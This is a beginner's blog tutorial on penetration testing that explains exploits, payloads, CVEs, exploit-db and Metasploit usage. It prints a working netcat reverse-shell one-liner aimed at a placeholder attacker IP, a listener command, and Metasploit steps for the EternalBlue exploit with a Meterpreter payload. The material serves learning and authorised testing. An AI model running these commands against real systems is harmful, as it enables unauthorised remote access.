In this article I will cover the basics of exploits and payloads, and the difference between the two. You will likely need to find exploits and use payloads as a fundamental part of every penetration test.
I am making these articles to keep myself motivated to learn cyber security, and to share my journey. 🙂 Join me on learning cyber security. I will try and explain concepts as I go.
Introduction to exploits and payloads
Some beginners are confused about the difference between exploits and payloads. In fact, the serve two very distinct functions in the exploitation process. Without a exploit there is not way to get your payload over, and without a payload you will not be able to get a shell.
Exploits
An exploit is a piece of code designed to take advantage of a vulnerability in a computer system. Since this definition covers every sort of system, every exploit will look different. These vulnerabilities are often found in real-world systems, since IT administrators often forget or lack the resources to keep their system completely up to date. There might also be vulnerabilities out there that have not been found!
Types of exploits
There are many types of exploits, such as:
- Buffer Overflow Exploits
- SQL Injection Exploits
- Cross-Site Scripting (XSS) Exploits
- Cross-Site Request Forgery (CSRF) Exploits
- Privilege Escalation Exploits
- Denial of Service (DoS) Exploits
- Phishing Exploits
- Zero-Day Exploits
- File Inclusion Exploits
- Malware and Trojan Exploits
Once again, the specifics are not important for now, but it is important to remember that exploits abuse a vulnerability, and these can be of a great variety.
CVE
One last piece of theory to cover is the definition of CVE. A CVE (Common Vulnerabilities and Exposures) refers to a specific instance of an attack or piece of code that takes advantage of a known vulnerability that has been assigned a CVE identifier.
This CVE gets assigned by a central authority, such as MITRE, after a researcher or other actor identifies a vulnerability. Once the vulnerability is known and an exploit exists, the responsible vendor or organization typically works to develop and release a patch or security update that fixes the vulnerability.
Once we start looking for exploits, we will often come across these CVEs!
Finding exploits
You generally find exploits by mapping the target’s network, for example by using nmap. This will hopefully give you a detailed overview of the targets hosts and services, and their versions. Following this, you can search for exploits either by googling, using Metasploit (using the search command) or using a site such as https://www.exploit-db.com. All these exploits on exploit-db will have a CVE number assigned.
After finding an exploit you can then create your own script to exploit the system or find someone else’s script (again from exploit-db.com).
An famous exploit is called EternalBlue, which exploits a vulnerability in SMB services:
https://www.exploit-db.com/exploits/42315
In many cases these are Python scripts, and often you have to edit some port or IP address for the exploit to work. Luckily these exploits are often well documented.
A different option is using Metasploit for running your exploits and get your payloads into the target system. We will not go into details but I will cover a Metasploit example in a bit. First we should cover what payloads are.
Payloads
While exploits take advantage of a flaw in a system, payloads are the piece of code that you sent over after you have exploited a system. A basic example of a payload is a piece of code that establishes a reverse shell to the target system. In a basic form this could look like this:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <Attacker ip> <Attacker listener port> > /tmp/
This requires you have a listener running on your system. A basic listener can be established by running:
nc -lvnp <port>
As soon as the payload is trigged your will get a reverse shell.
It is important to understand that payloads we use to get a shell on a system will largely be determined by what OS, shell interpreter languages, and even programming languages are present on the target.
While some payloads are one-liners and deployed manually like the one shown above, some are generated using automated attack frameworks such as with Metasploit.
Automating payloads with Metasploit
This article won’t cover Metasploit in detail, but it definitely the easiest way to use exploits and payloads for a beginner. The general procedure is as follows:
You just search for a exploit by using the search command like so:
search ms17-010
Then you select the exploit by using use <exploit id>. Then you set the options which are required when you list them ( show options)
Parameters you will often use are:
- RHOSTS: “Remote host”, the IP address of the target system. A single IP address or a network range can be set. You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt.
- RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
- LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP address.
- LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine.
You can set these by running set <parameter name> <value>.
Once you’ve set the exploit options, you can choose the payload you want to use. There are two different type of payloads in Metasploit:
- Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
- Staged: Staged payloads will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small, making these payloads less likely to be discovered.
Use the show payloads command to list available payloads for the selected exploit module. You might want to know if a payload is staged or single. If we look at: windows/shell/reverse_tcp and windows/shell_reverse_tcp, the one with the forward slash indicates that is a “staged” payload, the one with the underscore means it’s “single”.
Once you have found one you like you can use the set payload command followed by the name of the payload you want to use.
set payload windows/meterpreter/reverse_tcp
When you are done setting up you can run the exploit.
Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit. Now you are ready to escalate your privileges.
Anyway, this was enough Metasploit for now. I will make a future article on Metasploit itself!
It is important to note that it is also possible to create your own payloads with MSFvenom, which is part of the Metasploit framework. MSFvenom is great if we do not have direct network access to the target, and we need to deliver a payload, for example through mail. MSFvenom simply creates a payload file which you can use afterwards, but does not provide any of the other exploitation automation options like Metasploit.
Conclusion
In this article we covered exploits and payloads are their meaning:
- Exploits:
- An exploit is a piece of code or a technique that takes advantage of a vulnerability or weakness in a computer system or software application.
- Its primary purpose is to gain unauthorised access, control, or compromise the targeted system.
2. Payload:
- A payload, on the other hand, is the malicious code or action that an attacker delivers to a compromised system after successfully exploiting a vulnerability.
- The payload can vary widely in its purpose, from stealing data to creating a backdoor for future access or even causing system damage.
3. Metasploit
- Metasploit is a framework which we can use to automate running exploits and payloads and to gain access to a system. While Metasploit is great for beginners, try to not become to dependant on it since it is recommendable to learn how everything works without this amazing framework.
I hope this makes sense. Otherwise, let me know in the comments!
Like my articles?
It was great fun to write this summary. If you want you can leave me a clap or two 🙂
You are also welcome to support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: